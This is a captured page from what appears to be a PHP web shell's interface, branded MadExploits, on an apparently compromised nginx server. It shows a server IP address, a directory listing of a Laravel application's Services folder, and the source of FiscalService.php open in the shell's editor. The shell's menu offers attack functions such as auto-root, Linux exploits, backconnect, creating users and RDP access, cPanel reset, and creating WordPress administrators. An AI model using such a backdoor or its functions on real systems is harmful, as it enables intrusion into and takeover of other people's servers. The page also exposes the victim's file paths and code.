Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
app /
Services /
[ HOME SHELL ]
Name
Size
Permission
Action
AddressService.php
3.88
KB
-rw-rw-r--
AdminUserService.php
1.94
KB
-rw-rw-r--
AppUserService.php
1.7
KB
-rw-rw-r--
CategoryService.php
6.28
KB
-rw-rw-r--
FiscalService.php
1.13
KB
-rw-rw-r--
OfficeService.php
888
B
-rw-rw-r--
PriorityService.php
2.01
KB
-rw-rw-r--
SifarisFormService.php
994
B
-rw-rw-r--
SifarisRecordService.php
6.4
KB
-rw-rw-r--
StatusService.php
1.93
KB
-rw-rw-r--
YojanaBaseInterface.php
1.59
KB
-rw-rw-r--
YojanaBaseService.php
12.57
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FiscalService.php
<?php namespace App\Services; use App\Models\FiscalYear; use Exception; class FiscalService { public function list() { return FiscalYear::orderByDesc('start_date_ad')->get(); } public function add(array $data) { return FiscalYear::create($data)->save(); } public function updateItem($id, array $data) { $item = FiscalYear::find($id); if ($item) { $item->fill($data)->save(); } } public function deleteItem($id) { try { $item = FiscalYear::find($id); $item->delete(); } catch (\Illuminate\Database\QueryException $e) { if ($e->getCode() == 23000) { throw new Exception('This fiscal year cannot be deleted as it has been referenced by other records.'); } } catch (\Throwable $th) { throw new Exception($th); } } public function incrementRefNumber($fiscal_id) { $item = FiscalYear::find($fiscal_id); if ($item) { $item->ref_max_number = $item->ref_max_number + 1; $item->save(); } } }
Close